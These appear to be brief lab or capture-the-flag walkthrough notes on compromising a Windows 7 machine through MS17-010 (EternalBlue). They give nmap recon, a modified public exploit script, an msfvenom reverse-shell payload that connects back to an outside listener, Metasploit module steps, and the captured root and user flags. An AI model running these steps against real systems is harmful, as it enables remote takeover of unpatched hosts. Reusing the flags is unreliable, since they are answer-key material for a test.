Recon

  • Rustscan
  • nmap- nmap -A -p 135,139,445,49152,49153,49154,49155,49156,49157 10.129.209.90
  • System version- Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
  • smb-
  • nmapAutomator-

Exploit

  • https://github.com/helviojunior/MS17-010
  • Modify send_and_execute.py so that username is set to guest
  • Prepare the shell with MSF- msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7877 -f exe -o shellx64.exe
  • Actually, x86 also works here
  • Run the exploit- python send_and_execute.py 10.129.216.62 ../shellx64.exe
  • Catch the shell with nc-

MSF Exploit

  • use windows/smb/ms17_010_eternalblue
  • options
  • set RHOSTS 10.129.216.62
  • set LHOST 10.10.16.35
  • run
  • Get Root Key- ff548eb71e920ff6c08843ce9df4e717
  • Get User Key- 4c546aea7dbee75cbd71de245c8deea9